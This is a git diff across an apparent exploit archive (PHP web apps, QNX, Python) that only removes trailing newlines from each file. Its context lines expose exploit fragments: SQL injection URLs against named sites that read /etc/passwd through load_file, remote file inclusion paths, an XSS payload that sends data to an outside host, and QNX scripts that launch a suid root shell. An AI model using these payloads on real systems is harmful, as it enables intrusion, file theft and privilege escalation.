b/platforms/php/webapps/9635.txt @@ -43,4 +43,4 @@ TUHAN MEMBERKATI -# milw0rm.com [2009-09-10] +# milw0rm.com [2009-09-10] \ No newline at end of file diff --git a/platforms/php/webapps/9636.txt b/platforms/php/webapps/9636.txt index 33581eff9..7813e3ba2 100755 --- a/platforms/php/webapps/9636.txt +++ b/platforms/php/webapps/9636.txt @@ -15,4 +15,4 @@ http://www.plohni.com/wb/content/php/demos/An_image_gallery/navigation.php?path= Greetz:His0k4 & All My Friends ------------------------------------------------------------------------- -# milw0rm.com [2009-09-10] +# milw0rm.com [2009-09-10] \ No newline at end of file diff --git a/platforms/php/webapps/9637.txt b/platforms/php/webapps/9637.txt index 7742f5dee..861630936 100755 --- a/platforms/php/webapps/9637.txt +++ b/platforms/php/webapps/9637.txt @@ -103,4 +103,4 @@ No fix. *************************************************** -# milw0rm.com [2009-09-10] +# milw0rm.com [2009-09-10] \ No newline at end of file diff --git a/platforms/php/webapps/9639.txt b/platforms/php/webapps/9639.txt index 221f05e4b..205d168e2 100755 --- a/platforms/php/webapps/9639.txt +++ b/platforms/php/webapps/9639.txt @@ -15,4 +15,4 @@ http://www.site.com/Image_voting/index.php?show=-7%20union%20select%201,load_fil demo : http://www.plohni.com/wb/content/php/demos/Image_voting/index.php?show=-7%20union%20select%201,version(),3,4,5-- -# milw0rm.com [2009-09-11] +# milw0rm.com [2009-09-11] \ No newline at end of file diff --git a/platforms/php/webapps/9640.txt b/platforms/php/webapps/9640.txt index f1705f9a5..932cb32ef 100755 --- a/platforms/php/webapps/9640.txt +++ b/platforms/php/webapps/9640.txt @@ -49,4 +49,4 @@ [+]=================================================================[+] ---------===Jangan Ngambek Jack ===--------- -# milw0rm.com [2009-09-11] +# milw0rm.com [2009-09-11] \ No newline at end of file diff --git a/platforms/php/webapps/9647.txt b/platforms/php/webapps/9647.txt index a48fecc9b..c47b09f93 100755 --- a/platforms/php/webapps/9647.txt +++ b/platforms/php/webapps/9647.txt @@ -31,4 +31,4 @@ [+] : rm -rf malingsia [+] -# milw0rm.com [2009-09-11] +# milw0rm.com [2009-09-11] \ No newline at end of file diff --git a/platforms/php/webapps/9648.txt b/platforms/php/webapps/9648.txt index b59ec24dc..448152e01 100755 --- a/platforms/php/webapps/9648.txt +++ b/platforms/php/webapps/9648.txt @@ -122,4 +122,4 @@ Homepage: http://www.e-rdc.org/ -------------------------------- [ EOF ] ---------------------------------- -# milw0rm.com [2009-09-11] +# milw0rm.com [2009-09-11] \ No newline at end of file diff --git a/platforms/php/webapps/9653.txt b/platforms/php/webapps/9653.txt index 96299d1de..d28afed66 100755 --- a/platforms/php/webapps/9653.txt +++ b/platforms/php/webapps/9653.txt @@ -6,4 +6,4 @@ test', '0.0.0.0' ), ( 'test', ( SELECT CONCAT( username, 0x20, email ) FROM #__u jdc 2009 -# milw0rm.com [2009-09-14] +# milw0rm.com [2009-09-14] \ No newline at end of file diff --git a/platforms/php/webapps/9654.php b/platforms/php/webapps/9654.php index d1d426c1f..54b331bef 100755 --- a/platforms/php/webapps/9654.php +++ b/platforms/php/webapps/9654.php @@ -126,4 +126,4 @@ /* jdc 2009 */ -# milw0rm.com [2009-09-14] +# milw0rm.com [2009-09-14] \ No newline at end of file diff --git a/platforms/php/webapps/9656.txt b/platforms/php/webapps/9656.txt index c8755de54..70374713f 100755 --- a/platforms/php/webapps/9656.txt +++ b/platforms/php/webapps/9656.txt @@ -47,4 +47,4 @@ b. Bug : - install.plugin.php = 13 September 2009 > Monalisa happy b'day!! may add up in everything, always close to God and wish u all the best. Jesus bless u = =================================================================================================================================== -# milw0rm.com [2009-09-14] +# milw0rm.com [2009-09-14] \ No newline at end of file diff --git a/platforms/php/webapps/9665.pl b/platforms/php/webapps/9665.pl index 191633b9f..e7bef6e0b 100755 --- a/platforms/php/webapps/9665.pl +++ b/platforms/php/webapps/9665.pl @@ -133,4 +133,4 @@ sub get_content() { return $res->content; } -# milw0rm.com [2009-09-14] +# milw0rm.com [2009-09-14] \ No newline at end of file diff --git a/platforms/php/webapps/9669.txt b/platforms/php/webapps/9669.txt index fb08551c5..e6c1d20f4 100755 --- a/platforms/php/webapps/9669.txt +++ b/platforms/php/webapps/9669.txt @@ -9,4 +9,4 @@ Expl0it; http://www.target.com/file/stats.php?page='insert+into+counter+(countertitle)+values+('HackedByBgh7 tu bi gu') Bingoo ! counter name ediT =) -# milw0rm.com [2009-09-14] +# milw0rm.com [2009-09-14] \ No newline at end of file diff --git a/platforms/php/webapps/9674.txt b/platforms/php/webapps/9674.txt index ce88113ed..88a94e16b 100755 --- a/platforms/php/webapps/9674.txt +++ b/platforms/php/webapps/9674.txt @@ -17,4 +17,4 @@ ---------------------------------------------------------- Note:His0k4 Saha Ftooooork .....RANI TWAHCHTEK BZAFFFFFFFFFFFF -# milw0rm.com [2009-09-15] +# milw0rm.com [2009-09-15] \ No newline at end of file diff --git a/platforms/php/webapps/9681.txt b/platforms/php/webapps/9681.txt index 911324626..0370ae8cf 100755 --- a/platforms/php/webapps/9681.txt +++ b/platforms/php/webapps/9681.txt @@ -19,4 +19,4 @@ #manadocoding.net (all crew manadocoding) ######################################################################## -# milw0rm.com [2009-09-15] +# milw0rm.com [2009-09-15] \ No newline at end of file diff --git a/platforms/php/webapps/9692.txt b/platforms/php/webapps/9692.txt index 42642092e..5ef8a6656 100755 --- a/platforms/php/webapps/9692.txt +++ b/platforms/php/webapps/9692.txt @@ -54,4 +54,4 @@ <<->> and the guy whose unknown called HCJ :> hhhhhhhh just joke bro ... fuck to the lamerz who made u angry ^_* -# milw0rm.com [2009-09-15] +# milw0rm.com [2009-09-15] \ No newline at end of file diff --git a/platforms/php/webapps/9693.txt b/platforms/php/webapps/9693.txt index 611724fbb..a54764815 100755 --- a/platforms/php/webapps/9693.txt +++ b/platforms/php/webapps/9693.txt @@ -85,4 +85,4 @@ http://www.gamerszone.org/index.php?option=com_djcatalog&view=show&layout=blog&c #[!] Produced in South America +++++++++++++++++++++++++++++++++++++++ -# milw0rm.com [2009-09-15] +# milw0rm.com [2009-09-15] \ No newline at end of file diff --git a/platforms/php/webapps/9696.txt b/platforms/php/webapps/9696.txt index 932321e1c..15e967acc 100755 --- a/platforms/php/webapps/9696.txt +++ b/platforms/php/webapps/9696.txt @@ -20,4 +20,4 @@ #Str0ke >>>>>>>Milw0rm Note:His0k4 Saha Al Zalabiaaaaa Wa Saha elchribaaa .....RANI TWAHCHTEK BZAFFFFFFFFFFFF -# milw0rm.com [2009-09-16] +# milw0rm.com [2009-09-16] \ No newline at end of file diff --git a/platforms/php/webapps/9697.txt b/platforms/php/webapps/9697.txt index 356795bfc..349f740c1 100755 --- a/platforms/php/webapps/9697.txt +++ b/platforms/php/webapps/9697.txt @@ -46,4 +46,4 @@ http://demo.foobla.com/foobla-suggestions-joomla/index.php?option=com_foobla_sug #[!] Produced in South America +++++++++++++++++++++++++++++++++++++++ -# milw0rm.com [2009-09-16] +# milw0rm.com [2009-09-16] \ No newline at end of file diff --git a/platforms/php/webapps/9698.pl b/platforms/php/webapps/9698.pl index 125351e42..400860ba9 100755 --- a/platforms/php/webapps/9698.pl +++ b/platforms/php/webapps/9698.pl @@ -92,4 +92,4 @@ else {print " [-] Exploit Fallo :(\n";} -# milw0rm.com [2009-09-16] +# milw0rm.com [2009-09-16] \ No newline at end of file diff --git a/platforms/php/webapps/9699.txt b/platforms/php/webapps/9699.txt index bdae2d83c..cbda970c5 100755 --- a/platforms/php/webapps/9699.txt +++ b/platforms/php/webapps/9699.txt @@ -38,4 +38,4 @@ K!ll Upendra Yadav and Vijay Gachhedhaar By learn3r aka cyb3r lord Nepali Hackerz Are Not Dead!!! -# milw0rm.com [2009-09-16] +# milw0rm.com [2009-09-16] \ No newline at end of file diff --git a/platforms/php/webapps/9700.rb b/platforms/php/webapps/9700.rb index 421674947..0e17d7060 100755 --- a/platforms/php/webapps/9700.rb +++ b/platforms/php/webapps/9700.rb @@ -188,4 +188,4 @@ chars="0123456789abcdef" end end -# milw0rm.com [2009-09-16] +# milw0rm.com [2009-09-16] \ No newline at end of file diff --git a/platforms/php/webapps/9702.txt b/platforms/php/webapps/9702.txt index e58ce0003..f0db0f731 100755 --- a/platforms/php/webapps/9702.txt +++ b/platforms/php/webapps/9702.txt @@ -15,4 +15,4 @@ #Demo:http://eliteladders.com/demo/ladders.php?platform=-30+UNION%20SELECT%201,2,3,@@version,5,6,7-- ---------------------------------------------------------- -# milw0rm.com [2009-09-16] +# milw0rm.com [2009-09-16] \ No newline at end of file diff --git a/platforms/php/webapps/9703.txt b/platforms/php/webapps/9703.txt index f1142b211..c7da062b7 100755 --- a/platforms/php/webapps/9703.txt +++ b/platforms/php/webapps/9703.txt @@ -20,4 +20,4 @@ #manadocoding.net (all crew manadocoding) ######################################################################## -# milw0rm.com [2009-09-16] +# milw0rm.com [2009-09-16] \ No newline at end of file diff --git a/platforms/php/webapps/9706.txt b/platforms/php/webapps/9706.txt index 8887e6df0..25566c55c 100755 --- a/platforms/php/webapps/9706.txt +++ b/platforms/php/webapps/9706.txt @@ -23,4 +23,4 @@ This component is released under the GNU/GPL License <version>1.14</version> <description>Album Component For Joomla</description>/str0ke -# milw0rm.com [2009-09-17] +# milw0rm.com [2009-09-17] \ No newline at end of file diff --git a/platforms/php/webapps/9708.txt b/platforms/php/webapps/9708.txt index b0b6cb5cb..392bf7e1d 100755 --- a/platforms/php/webapps/9708.txt +++ b/platforms/php/webapps/9708.txt @@ -41,4 +41,4 @@ * GOD BLESS ALL * -# milw0rm.com [2009-09-17] +# milw0rm.com [2009-09-17] \ No newline at end of file diff --git a/platforms/php/webapps/9710.txt b/platforms/php/webapps/9710.txt index fce6cc6aa..52d14aaf5 100755 --- a/platforms/php/webapps/9710.txt +++ b/platforms/php/webapps/9710.txt @@ -23,4 +23,4 @@ K!ll Parmananda Jha, Upendra Yadav and Vijay Gachhedhaar By learn3r aka cyb3r lord Nepali Hackerz Are Not Dead!!! -# milw0rm.com [2009-09-17] +# milw0rm.com [2009-09-17] \ No newline at end of file diff --git a/platforms/php/webapps/9711.txt b/platforms/php/webapps/9711.txt index 64dd1b864..660f71aaf 100755 --- a/platforms/php/webapps/9711.txt +++ b/platforms/php/webapps/9711.txt @@ -29,4 +29,4 @@ K!ll Parmananda Jha, Upendra Yadav and Vijay Gachhedhaar By learn3r aka cyb3r lord Nepali Hackerz Are Not Dead!!! -# milw0rm.com [2009-09-17] +# milw0rm.com [2009-09-17] \ No newline at end of file diff --git a/platforms/php/webapps/9712.txt b/platforms/php/webapps/9712.txt index 9eae1d37c..f5a1d13dd 100755 --- a/platforms/php/webapps/9712.txt +++ b/platforms/php/webapps/9712.txt @@ -24,4 +24,4 @@ K!ll Parmananda Jha, Upendra Yadav and Vijay Gachhedhaar By learn3r aka cyb3r lord Nepali Hackerz Are Not Dead!!! -# milw0rm.com [2009-09-17] +# milw0rm.com [2009-09-17] \ No newline at end of file diff --git a/platforms/php/webapps/9713.pl b/platforms/php/webapps/9713.pl index 9fb6b4fcc..1cfa417a1 100755 --- a/platforms/php/webapps/9713.pl +++ b/platforms/php/webapps/9713.pl @@ -148,4 +148,4 @@ else {print " [-] Exploit Fallo :(\n";} -# milw0rm.com [2009-09-17] +# milw0rm.com [2009-09-17] \ No newline at end of file diff --git a/platforms/php/webapps/9801.txt b/platforms/php/webapps/9801.txt index dc5df76b6..547db00b5 100755 --- a/platforms/php/webapps/9801.txt +++ b/platforms/php/webapps/9801.txt @@ -371,4 +371,4 @@ strlen($LANGARRAY['aaspam']); curl_close($crl); exit(); -?> +?> \ No newline at end of file diff --git a/platforms/php/webapps/9812.txt b/platforms/php/webapps/9812.txt index b483edc7a..762ce97e0 100755 --- a/platforms/php/webapps/9812.txt +++ b/platforms/php/webapps/9812.txt @@ -53,4 +53,4 @@ http://ithinkbiz.com/index.php?option=com_icrmbasic&p1=m6&p3=-10+union+select+1, [+] makasih buad babe and enyak .... muach .. [+] makasih buat om tukulesto yg menemani saia selalu dan enggak bosen ma gue .. hahaha -[+] gila 20 Jam duet ma tukulesto akhirnye ada hasil ^_^ +[+] gila 20 Jam duet ma tukulesto akhirnye ada hasil ^_^ \ No newline at end of file diff --git a/platforms/php/webapps/9818.txt b/platforms/php/webapps/9818.txt index b0a9c3bef..02dc22878 100755 --- a/platforms/php/webapps/9818.txt +++ b/platforms/php/webapps/9818.txt @@ -33,4 +33,4 @@ www.MainHack.net - www.ServerIsDown.org - www.sux0r.net VOP Crew [ Vaksin13 * OoN_Boy * Paman ] R3VAN_BASTARD * Kecemplungkalen * em|nem Jupe Crew [internet itu gratis jendral] -================================================================= +================================================================= \ No newline at end of file diff --git a/platforms/php/webapps/982.c b/platforms/php/webapps/982.c index 9d861743e..ed8cc31be 100755 --- a/platforms/php/webapps/982.c +++ b/platforms/php/webapps/982.c @@ -828,4 +828,4 @@ int filter_f(char *test_bf,int tnum) return 0; } -// milw0rm.com [2005-05-06] +// milw0rm.com [2005-05-06] \ No newline at end of file diff --git a/platforms/php/webapps/9820.txt b/platforms/php/webapps/9820.txt index 30fd97bd2..8aaf7dbaa 100755 --- a/platforms/php/webapps/9820.txt +++ b/platforms/php/webapps/9820.txt @@ -21,5 +21,4 @@ http://www.innenstadterleben.de/index.php?mainid=30+and+substring(@@version,1,1) [o] Note this is a private script -all target are in one IP address - +all target are in one IP address \ No newline at end of file diff --git a/platforms/php/webapps/9821.txt b/platforms/php/webapps/9821.txt index eaaeee759..5eac1a790 100755 --- a/platforms/php/webapps/9821.txt +++ b/platforms/php/webapps/9821.txt @@ -15,6 +15,4 @@ lib/pathwirte.php [o] Exploit http://localhost/[path]/lib/FSphp.php?FSPHP_LIB=[evilc0de] http://localhost/[path]/lib/navigation.php?FSPHP_LIB=[evilc0de] -http://localhost/[path]/lib/pathwirte.php?FSPHP_LIB=[evilc0de] - - +http://localhost/[path]/lib/pathwirte.php?FSPHP_LIB=[evilc0de] \ No newline at end of file diff --git a/platforms/php/webapps/9822.txt b/platforms/php/webapps/9822.txt index 5a4349e8d..da061d64d 100755 --- a/platforms/php/webapps/9822.txt +++ b/platforms/php/webapps/9822.txt @@ -52,4 +52,4 @@ http://www.unibaseball.co.uk/index.php?option=com_fastball&league=-666+union+sel [+] makasih buad babe and enyak .... muach .. [+] makasih buat om tukulesto yg menemani saia selalu dan enggak bosen ma gue .. hahaha -[+] aurakasih napa sih lo susah banget di hubungi ?? .. hha +[+] aurakasih napa sih lo susah banget di hubungi ?? .. hha \ No newline at end of file diff --git a/platforms/php/webapps/9824.txt b/platforms/php/webapps/9824.txt index afcf487e4..52f641d2a 100755 --- a/platforms/php/webapps/9824.txt +++ b/platforms/php/webapps/9824.txt @@ -52,4 +52,4 @@ http://cms.swissmango.com/demos/business/index.php?main=666+and+1=2+union+select [+] makasih buad babe and enyak .... muach .. [+] makasih buat om tukulesto dan arianom yg menemani saia selalu dan enggak bosen ma gue .. hahaha -[+] aurakasih cintailah akuw ... :p +[+] aurakasih cintailah akuw ... :p \ No newline at end of file diff --git a/platforms/php/webapps/9825.txt b/platforms/php/webapps/9825.txt index 5031c9766..69d365d7c 100755 --- a/platforms/php/webapps/9825.txt +++ b/platforms/php/webapps/9825.txt @@ -19,4 +19,4 @@ I mentioned about this vulnerability at my site Best wishes & regards, MustLive Administrator of Websecurity web site -http://websecurity.com.ua +http://websecurity.com.ua \ No newline at end of file diff --git a/platforms/php/webapps/9826.txt b/platforms/php/webapps/9826.txt index 4845949fa..c8b5dd4d9 100755 --- a/platforms/php/webapps/9826.txt +++ b/platforms/php/webapps/9826.txt @@ -53,4 +53,4 @@ http://www.mindsculpt.com/cms_demo/index.php?subj=-3+union+select+1,concat_ws(0x [ QUOTE ] [+] kaMtiEz -=- Don Tukulesto -=- M3NW5 -=- 30 hari mencari AuraKasih .... -[+] AURAKASIH I LOVE U FULL arghhhhh ... +[+] AURAKASIH I LOVE U FULL arghhhhh ... \ No newline at end of file diff --git a/platforms/php/webapps/9828.txt b/platforms/php/webapps/9828.txt index c46bfcfb1..03dcdbaac 100755 --- a/platforms/php/webapps/9828.txt +++ b/platforms/php/webapps/9828.txt @@ -152,4 +152,4 @@ Digital Security is one of the leading IT security companies in CEMEA, providing Contact: research [at] dsecrg [dot] com -http://www.dsecrg.com +http://www.dsecrg.com \ No newline at end of file diff --git a/platforms/php/webapps/9830.txt b/platforms/php/webapps/9830.txt index d6276c31a..ba5fc9445 100755 --- a/platforms/php/webapps/9830.txt +++ b/platforms/php/webapps/9830.txt @@ -10,4 +10,4 @@ example:- http://www.example.in/index.php?p=affichedecision&id=-669 union select 1,2,3,4,5,6,load_file('/etc/passwd'),8+from+mysql.user -================================================ +================================================ \ No newline at end of file diff --git a/platforms/php/webapps/9832.txt b/platforms/php/webapps/9832.txt index a7fff7fb2..6a788b430 100755 --- a/platforms/php/webapps/9832.txt +++ b/platforms/php/webapps/9832.txt @@ -50,4 +50,4 @@ Minal Aidin Wal Faidzin. [ SP3C!AL ] -lovely Emak, Bapak, Adek ku sayang (^_^) +lovely Emak, Bapak, Adek ku sayang (^_^) \ No newline at end of file diff --git a/platforms/php/webapps/9833.txt b/platforms/php/webapps/9833.txt index 628daa429..f920778cb 100755 --- a/platforms/php/webapps/9833.txt +++ b/platforms/php/webapps/9833.txt @@ -55,4 +55,4 @@ http://www.engineering.edu.sg/index.php?option=com_facebook&view=student&id=-666 [ QUOTE ] [+] kaMtiEz -=- Don Tukulesto -=- M3NW5 -=- 30 hari mencari AuraKasih .... -[+] AURAKASIH I LOVE U FULL arghhhhh ... +[+] AURAKASIH I LOVE U FULL arghhhhh ... \ No newline at end of file diff --git a/platforms/php/webapps/9835.txt b/platforms/php/webapps/9835.txt index 5b09a2863..42a90a43f 100755 --- a/platforms/php/webapps/9835.txt +++ b/platforms/php/webapps/9835.txt @@ -30,4 +30,4 @@ ################################################################### - + \ No newline at end of file diff --git a/platforms/php/webapps/9836.txt b/platforms/php/webapps/9836.txt index c0b3715de..af6ec7ecb 100755 --- a/platforms/php/webapps/9836.txt +++ b/platforms/php/webapps/9836.txt @@ -63,4 +63,4 @@ [x]========================================================================================================================================[x] | Note : Selamat hariraya idul fitri mohon maaf lahir dan batin, maafin kesalahan ku selama ini yah all :) | | kabur.... untuk sementara waktu.... bye bye..... | -[x]========================================================================================================================================[x] +[x]========================================================================================================================================[x] \ No newline at end of file diff --git a/platforms/php/webapps/9837.txt b/platforms/php/webapps/9837.txt index 013957c44..3c2f37402 100755 --- a/platforms/php/webapps/9837.txt +++ b/platforms/php/webapps/9837.txt @@ -61,4 +61,4 @@ [x]========================================================================================================================================[x] | Note : Selamat hariraya idul fitri mohon maaf lahir dan batin, maafin kesalahan ku selama ini yah all :) | | kabur.... untuk sementara waktu.... bye bye..... | -[x]========================================================================================================================================[x] +[x]========================================================================================================================================[x] \ No newline at end of file diff --git a/platforms/php/webapps/9838.pl b/platforms/php/webapps/9838.pl index 36f2b23ae..8c0faac8e 100755 --- a/platforms/php/webapps/9838.pl +++ b/platforms/php/webapps/9838.pl @@ -122,4 +122,4 @@ sub get_content() { return $res->content; } -# Exploit End +# Exploit End \ No newline at end of file diff --git a/platforms/php/webapps/9839.txt b/platforms/php/webapps/9839.txt index f19e9d97c..2bb2c197d 100755 --- a/platforms/php/webapps/9839.txt +++ b/platforms/php/webapps/9839.txt @@ -19,4 +19,4 @@ thenqyu : IndonesianCoder.SurabayaHackerLink.ServerIsDown.Kill-9 gonzhack.cyb3r_tr0n.m364tr0n. YogyaCarderLink.v3n0m ############################################################# - + \ No newline at end of file diff --git a/platforms/php/webapps/9840.txt b/platforms/php/webapps/9840.txt index 9cadd32be..508cc1beb 100755 --- a/platforms/php/webapps/9840.txt +++ b/platforms/php/webapps/9840.txt @@ -19,4 +19,4 @@ thenqyu : IndonesianCoder.SurabayaHackerLink.ServerIsDown.Kill-9 gonzhack.cyb3r_tr0n.m364tr0n. YogyaCarderLink.v3n0m ############################################################# - + \ No newline at end of file diff --git a/platforms/php/webapps/9849.php b/platforms/php/webapps/9849.php index f413f2cb2..b3789cade 100755 --- a/platforms/php/webapps/9849.php +++ b/platforms/php/webapps/9849.php @@ -134,4 +134,4 @@ $resp .= fread($fp, 1024); return $resp; } -?> +?> \ No newline at end of file diff --git a/platforms/php/webapps/9867.txt b/platforms/php/webapps/9867.txt index 352f09b31..1426eaf5a 100755 --- a/platforms/php/webapps/9867.txt +++ b/platforms/php/webapps/9867.txt @@ -28,4 +28,4 @@ and will realize the login attempt ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ References: (on Russian) http://onsec.ru/vuln?id=11 -http://onsec.ru/vuln?id=12 +http://onsec.ru/vuln?id=12 \ No newline at end of file diff --git a/platforms/php/webapps/989.pl b/platforms/php/webapps/989.pl index 7f9fa1c0e..cba4e0055 100755 --- a/platforms/php/webapps/989.pl +++ b/platforms/php/webapps/989.pl @@ -52,4 +52,4 @@ print "Server Exploited\n"; print "You should check $mail now"; close($socket); -# milw0rm.com [2005-05-13] +# milw0rm.com [2005-05-13] \ No newline at end of file diff --git a/platforms/php/webapps/9897.txt b/platforms/php/webapps/9897.txt index 406f8f283..ea9ea6721 100755 --- a/platforms/php/webapps/9897.txt +++ b/platforms/php/webapps/9897.txt @@ -22,4 +22,4 @@ http://[ webserver IP][:port]/[ file ][/] http://172.16.2.101:8080/index.html/ http://172.16.2.101:8080/index.php/ -#[pocoftheday.blogspot.com] +#[pocoftheday.blogspot.com] \ No newline at end of file diff --git a/platforms/php/webapps/9903.txt b/platforms/php/webapps/9903.txt index a433deccc..75ce7a0f1 100755 --- a/platforms/php/webapps/9903.txt +++ b/platforms/php/webapps/9903.txt @@ -69,4 +69,4 @@ opendocmanv1.2.5.2: http://sourceforge.net/projects/opendocman/files/opendocman/ 12th Oct 2009 : vendor was notified by e-mail 12th Oct 2009 : Vendor response received 20th Oct 2009 : A new release publicly available -20th Oct 2009 : Public Disclosure +20th Oct 2009 : Public Disclosure \ No newline at end of file diff --git a/platforms/php/webapps/9906.rb b/platforms/php/webapps/9906.rb index d8c3e7e59..c87c240fb 100755 --- a/platforms/php/webapps/9906.rb +++ b/platforms/php/webapps/9906.rb @@ -69,4 +69,4 @@ class Metasploit3 < Msf::Exploit::Remote handler end -end +end \ No newline at end of file diff --git a/platforms/php/webapps/9908.rb b/platforms/php/webapps/9908.rb index bb5d743aa..1b3f3de32 100755 --- a/platforms/php/webapps/9908.rb +++ b/platforms/php/webapps/9908.rb @@ -68,4 +68,4 @@ class Metasploit3 < Msf::Exploit::Remote handler end -end +end \ No newline at end of file diff --git a/platforms/php/webapps/9911.rb b/platforms/php/webapps/9911.rb index 08d227802..9af0cd282 100755 --- a/platforms/php/webapps/9911.rb +++ b/platforms/php/webapps/9911.rb @@ -106,4 +106,4 @@ class Metasploit3 < Msf::Exploit::Remote end end -end +end \ No newline at end of file diff --git a/platforms/php/webapps/9926.rb b/platforms/php/webapps/9926.rb index 5deae7d02..c37409450 100755 --- a/platforms/php/webapps/9926.rb +++ b/platforms/php/webapps/9926.rb @@ -171,4 +171,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end +end \ No newline at end of file diff --git a/platforms/php/webapps/996.pl b/platforms/php/webapps/996.pl index 4b6d9cc00..e000c4f48 100755 --- a/platforms/php/webapps/996.pl +++ b/platforms/php/webapps/996.pl @@ -136,4 +136,4 @@ sub usage() } -# milw0rm.com [2005-05-17] +# milw0rm.com [2005-05-17] \ No newline at end of file diff --git a/platforms/php/webapps/9961.txt b/platforms/php/webapps/9961.txt index aa738b6ff..67eb0049a 100755 --- a/platforms/php/webapps/9961.txt +++ b/platforms/php/webapps/9961.txt @@ -15,4 +15,4 @@ #=========================================================== ################################################################# # Securitylab Security Research Team -################################################################### +################################################################### \ No newline at end of file diff --git a/platforms/php/webapps/9964.txt b/platforms/php/webapps/9964.txt index 714bda593..0ede7dd99 100755 --- a/platforms/php/webapps/9964.txt +++ b/platforms/php/webapps/9964.txt @@ -323,4 +323,4 @@ $tmp = explode(":", $hash); print("[*] Admin cookie: rc2_sess=". urlencode(serialize(array($_uid, sha1($tmp[0].$tmp[1]), time()+ 2678400))).";"); -?> +?> \ No newline at end of file diff --git a/platforms/plan9/local/3383.c b/platforms/plan9/local/3383.c index 0600c9b33..4238ec0a5 100755 --- a/platforms/plan9/local/3383.c +++ b/platforms/plan9/local/3383.c @@ -867,4 +867,4 @@ addseg(char * p) return True; } -// milw0rm.com [2007-02-28] +// milw0rm.com [2007-02-28] \ No newline at end of file diff --git a/platforms/python/remote/42251.rb b/platforms/python/remote/42251.rb index 305b85bd2..fe7960e2b 100755 --- a/platforms/python/remote/42251.rb +++ b/platforms/python/remote/42251.rb @@ -199,4 +199,4 @@ class MetasploitModule < Msf::Exploit::Remote }) end -end +end \ No newline at end of file diff --git a/platforms/python/webapps/38411.txt b/platforms/python/webapps/38411.txt index 1c95f59ee..34e8e9e07 100755 --- a/platforms/python/webapps/38411.txt +++ b/platforms/python/webapps/38411.txt @@ -154,4 +154,4 @@ The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. -by hyp3rlinx +by hyp3rlinx \ No newline at end of file diff --git a/platforms/python/webapps/39199.html b/platforms/python/webapps/39199.html index b7725629f..0525debf1 100755 --- a/platforms/python/webapps/39199.html +++ b/platforms/python/webapps/39199.html @@ -21,5 +21,4 @@ value="<script>new Image().src="http://bugs. <input type="submit" value="Submit request" /> </form> </body> -</html> - +</html> \ No newline at end of file diff --git a/platforms/python/webapps/39821.txt b/platforms/python/webapps/39821.txt index c550d17e2..ed86bdd88 100755 --- a/platforms/python/webapps/39821.txt +++ b/platforms/python/webapps/39821.txt @@ -100,5 +100,4 @@ Steps To Reproduction Video POC - https://www.youtube.com/watch?v=d4V8qlNrYtk -Detailed POC - http://websecgeeks.com/web2py-2-14-5-multiple-vulnerabilities/ - +Detailed POC - http://websecgeeks.com/web2py-2-14-5-multiple-vulnerabilities/ \ No newline at end of file diff --git a/platforms/python/webapps/40129.txt b/platforms/python/webapps/40129.txt index eb5a271ee..14b837a7f 100755 --- a/platforms/python/webapps/40129.txt +++ b/platforms/python/webapps/40129.txt @@ -344,6 +344,4 @@ authors or managers. To record, list, modify, use or edit our material contact ( -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com -CONTACT: research@vulnerability-lab.com - - +CONTACT: research@vulnerability-lab.com \ No newline at end of file diff --git a/platforms/qnx/dos/7823.txt b/platforms/qnx/dos/7823.txt index ba98e14b5..5b392dcca 100755 --- a/platforms/qnx/dos/7823.txt +++ b/platforms/qnx/dos/7823.txt @@ -193,4 +193,4 @@ H$0````,``````````````/@<``"N```````````````!```````````` ` end -# milw0rm.com [2009-01-19] +# milw0rm.com [2009-01-19] \ No newline at end of file diff --git a/platforms/qnx/local/1347.c b/platforms/qnx/local/1347.c index 2df807e92..d9c8bb999 100755 --- a/platforms/qnx/local/1347.c +++ b/platforms/qnx/local/1347.c @@ -87,4 +87,4 @@ int main (int argc, char **argv) { return (0); } -// milw0rm.com [2005-11-30] +// milw0rm.com [2005-11-30] \ No newline at end of file diff --git a/platforms/qnx/local/1479.sh b/platforms/qnx/local/1479.sh index e75ded2a9..6f5dad058 100755 --- a/platforms/qnx/local/1479.sh +++ b/platforms/qnx/local/1479.sh @@ -19,4 +19,4 @@ export PHOTON2_PATH=mom ./phfont rm phfont* -# milw0rm.com [2006-02-08] +# milw0rm.com [2006-02-08] \ No newline at end of file diff --git a/platforms/qnx/local/1481.sh b/platforms/qnx/local/1481.sh index efcc48e2e..470864e0a 100755 --- a/platforms/qnx/local/1481.sh +++ b/platforms/qnx/local/1481.sh @@ -18,4 +18,4 @@ __EOF__ else echo "system is not a default QNX 6.3.0 install, or someone set correct permissions manually, sorry"; fi -# milw0rm.com [2006-02-08] +# milw0rm.com [2006-02-08] \ No newline at end of file diff --git a/platforms/qnx/local/19851.c b/platforms/qnx/local/19851.c index 2d92258b8..f5f0025d3 100755 --- a/platforms/qnx/local/19851.c +++ b/platforms/qnx/local/19851.c @@ -58,5 +58,4 @@ does. A rotation */ } newpw[8]=0; return newpw; -} - +} \ No newline at end of file diff --git a/platforms/qnx/local/27168.txt b/platforms/qnx/local/27168.txt index ef35e66fd..da02e763d 100755 --- a/platforms/qnx/local/27168.txt +++ b/platforms/qnx/local/27168.txt @@ -8,4 +8,4 @@ QNX version 6.2.0, 6.2.1, and 6.3 are affected by these issues; earlier versions To exploit the denial-of-service vulnerability, the following command is reportedly sufficient: -echo -e "break *0xb032d59fnrncontncont" | gdb gdb +echo -e "break *0xb032d59fnrncontncont" | gdb gdb \ No newline at end of file diff --git a/platforms/qnx/local/32153.sh b/platforms/qnx/local/32153.sh index 91f3d1ce2..f4a12947f 100755 --- a/platforms/qnx/local/32153.sh +++ b/platforms/qnx/local/32153.sh @@ -62,4 +62,4 @@ chmod +x /tmp/0 echo "[-] executing ifwatchd, please wait" ifwatchd -A /tmp/0 -v lo0 2>&1 >/dev/null echo "[-] now executing suid shell" -/tmp/shell +/tmp/shell \ No newline at end of file diff --git a/platforms/qnx/local/32154.c b/platforms/qnx/local/32154.c index 3cc273f15..2d5735782 100755 --- a/platforms/qnx/local/32154.c +++ b/platforms/qnx/local/32154.c @@ -140,4 +140,4 @@ main() execve(prog[0], prog, envp); return(0); -} +} \ No newline at end of file diff --git a/platforms/qnx/local/32155.c b/platforms/qnx/local/32155.c index 73c8a55b3..48e32e6c8 100755 --- a/platforms/qnx/local/32155.c +++ b/platforms/qnx/local/32155.c @@ -190,4 +190,4 @@ main(int argc, char **argv) system("/tmp/shell"); return(0); -} +} 